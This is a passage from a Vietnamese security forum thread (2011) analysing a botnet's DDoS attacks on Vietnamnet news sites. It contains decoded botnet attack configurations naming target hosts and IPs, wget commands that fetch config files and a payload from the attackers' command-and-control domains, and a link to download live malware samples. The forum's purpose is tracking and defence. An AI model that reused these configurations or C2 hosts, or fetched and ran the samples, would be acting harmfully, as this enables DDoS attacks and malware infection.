PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/;//RET+http://vietnamnet.vn/vn/index.html;//REP+http://vietnamnet.vn/vn/index.html;//LIP+;//RIP+vietnamnet.vn:80:117.103.197.249;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+30;//ANT+10;//EST+60;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+1;//FIR+0;//JOP+o;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+;//RIP+vietnamnet.vn:80:123.30.133.166;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+45;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+DES;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+0;//RAN+0;//CCR+20;//CCK+300;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+;//RIP+vietnamnet.vn:80:123.30.184.10;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+35;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+DES;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+0;//RAN+0;//CCR+20;//CCK+300;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+tuanvietnam.vietnamnet.vn;//ITS+http://tuanvietnam.vietnamnet.vn/;//RET+;//REP+;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+8;//CON+40;//ANT+10;//EST+150;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vef.vn;//ITS+http://vef.vn/;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+8;//CON+30;//ANT+10;//EST+150;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+0;//CRA+0;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+m.vietnamnet.vn;//ITS+http://m.vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+3;//CON+30;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+0;//CRA+0;//BAC+1;//RAN+0;//CCR+30;//CCK+20;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamweek.net;//ITS+http://vietnamweek.net/;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+1;//PRD+;//PP2+;//PD2+;//VER+;//THE+3;//CON+35;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+2;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+20;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+option.drfound.net;//ITS+http://option.drfound.net/k113.css;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//THE+1;//CON+100;//EST+1500;//NOD+1;//FOL+0;//REF+0;//ENC+RSA;//SLE+30;//BAC+0;//RAN+0;//CCR+;//CCK+;//FRE+;//FOR+;//MAX+;//POC+89;//PAT+AppData;//FLE+iTunes.tmp;//SIE+1054208;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\


Lần này, sau khi đọc topic này, mấy anh thêm cái http://tuanvietnam.vietnamnet.vn vào danh sách mục tiêu, triệt đường VNN hết à ? Khốn nạn thật, tìm đủ cách để DDOS VNN ngay cả khi đã bị vạch trần, phanh phui.

Các cơ quan chức năng của Vietnam ta đâu rồi, nhắm mắt làm ngơ hết rồi à, nhận được lệnh rồi à ?
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 13:21:54 (+0700) | #713 | 245949
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
anh em nào yêu thể thao thì vào đây xem tạm

http://thethao.vietnamnet.vn/ smilie không biết mấy anh STL có add nốt vào danh sách ko nữa
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 13:32:03 (+0700) | #714 | 245951
docong1010
Member

[Minus]    0    [Plus]
Joined: 28/12/2004 14:11:13
Messages: 72
Offline
[Profile] [PM]

mrquytk93 wrote:
Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT "
Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không
Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán
Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood
Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào

-------------------------------------------------------------------------
Mr.Quy CBG.No1

ADMIN - ATH  


Bồ này hay nhỉ khẳng định như thế và tự tin vào khả năng của mình quá nhé.

.HI Anh TQN
Hiện nay một số server đặt tại FPT nhiễm con SbieMgsdfsdfsdfm.dll , SbieSvdsfsdfc.exe e nghĩ hai con này giống như anh đã phân tích. Nó cũng DDOS tới Vietnamnet. 2 con này nó nằm trong Program file và folder có tên là Sandboxie. Mấy admin nào dùng 2k3, 2k8 xem thử có không nhá.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 13:53:28 (+0700) | #715 | 245952
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Coi như toàn bộ Vietnamnet tê liệt rồi. Vào trang thethao.vietnamnet.vn cũng không được luôn, trắng nhách.
Sùng gan rồi nha ! Mấy ông nội "quăng bom" BKIS trốn đâu hết rồi, sao không ra mặt đi. Cái chuyện ở Hàn Quốc xa lắc xa lơ không ai nhờ, mấy ông "bồ chao" nhảy vô check chiếc bậy bạ, hắc hiết lung tung rồi la làng la xóm, quãng cáo trên báo đài. Sao vụ này mấy ông im re vậy ? Đại dịch ở VN đấy, người Việt phản động, bán nước cho tàu đánh người Việt đấy, sao không nhảy vô. Còn cái đám "Sứ giả thiện chiến" (cãi) của BKAV nữa, biến luôn đi cho em nhờ, đi đâu cũng quãng cáo được hết.
Một số lượng rất lớn "mèo què, mèo đui, mèo cụt" của stl như vậy, em bị stress nặng rồi, rce sơ sài, không hết nổi, không tới nơi tới chốn, ngay cả bản thân mình cũng bực. Bà con nào muốn học, thực tập RCE, "mèo què" analysis, cứ lên thư mục này download từng con về thực tập, vừa giúp mọi người luôn: http://www.mediafire.com/?tz745o0f678w8
Sorry bà con, em tức quá rồi !
Còn mấy thằng coder của stl, tụi mày giải nghệ đi cho tao nhờ, quay đi quay lại chỉ biết có CString không, chỉ biết ăn cắp code, đạo code không hả. Code như tụi mày cả năm nay rồi chả có lên tay gì hết. Nghỉ quách đi ! Tốn tiền của dân ngu cu đen như tụi tao. Tụi tao đóng thuế để nuôi cái đám bất tài vô tướng, mất đạo đức như tụi mày hả ? Nhà nước cho thằng nào trong tụi mày đi du học chỉ có uổng cơm uổng gạo, tốn tiền, tụi mày về chả đóng góp gì cho nhân dân hết, lại còn phá hoại, bán nước nữa. Tụi mày thức tỉnh đi, quay đầu đi !
Code thì chỉ 3, 4 hàm, còn CString thì tới mấy chục hàm. Anh em cùng công ty của tôi đang đọc topic này nhớ không, hồi đó coder nào dưới quyền em mà đụng một chút là CString là em phang ngay, bắt sữa ngay, anh em hồi đó la làng la xóm, ông TQN khó quá smilie
Thôi, chữi vậy đủ rồi, quay lại PatchDiff tiếp cái IAStoreUIHelper.dll cái. Một lát nữa em sẽ cho ra cái địa chỉ mà thằng nằm vùng này down con bot về.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 14:11:15 (+0700) | #716 | 245953
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
@anh TQN em dùng DNS của Google mạng FPT vẫn vào ngon anh à
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 14:37:27 (+0700) | #717 | 245954
trycatch
Member

[Minus]    0    [Plus]
Joined: 07/12/2010 20:00:36
Messages: 15
Offline
[Profile] [PM]

TQN wrote:
Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái.
Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause


Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi.

Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.
 

Hi TQN,
Chỉ trong vòng 1h vừa qua đã có sự thay đổi trong file pref.firebay.cn_index.txt
link: lúc 14h30: http://www.mediafire.com/?lq1cuttlt7etb2n
lúc 15h30: http://www.mediafire.com/?724ayc0ic5xa8c1
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 18:03:03 (+0700) | #718 | 245967
cayaoanh830
Member

[Minus]    0    [Plus]
Joined: 13/06/2011 09:34:01
Messages: 37
Location: Nowhere
Offline
[Profile] [PM] [Email] [Yahoo!]
Làm sao để Decode mấy file _index vậy mấy ơi.
Em thấy 4 file _index khi chưa decode có nội dung y như nhau.

PS: Vừa nảy vào thì HVA báo là "máy chủ đóng vai trò là gateway hoặ Proxy nhưng kông nhận ... máy chủ ở trên" gì đó là gì vậy các anh.
...Yesterday - Today - Tomorrow...
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 18:43:06 (+0700) | #719 | 245969
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

v74 wrote:
con số hoạt động biến hoá nếu làm theo cách của admin thì quá dể nhưng không biết một lần tiêu diệt hết không hay để lại tàn dư ....ập vào thì ta kéo ra..một lần hay một cái thi có trời mới biết 


Không có chuyện chỉ có "trời" mới biết đâu bạn smilie .
Quan trọng nhất là có phát hiện ra máy tính hay mạng của mình đã và đang bị tấn công hoặc khai thác hay không thôi.
Còn khi đã phát hiện rồi mà không khắc phục được thì hoặc là trình độ non kém, hoặc là lười nhác và vô trách nhiệm với bản thân và xã hội.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/08/2011 19:38:42 (+0700) | #720 | 245972
template
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 02:18:47
Messages: 16
Offline
[Profile] [PM]

TQN wrote:

À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé ! 


Bác vào đây tự build cấu hình hết theo ý mình : http://thinkpadstyle.com/
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|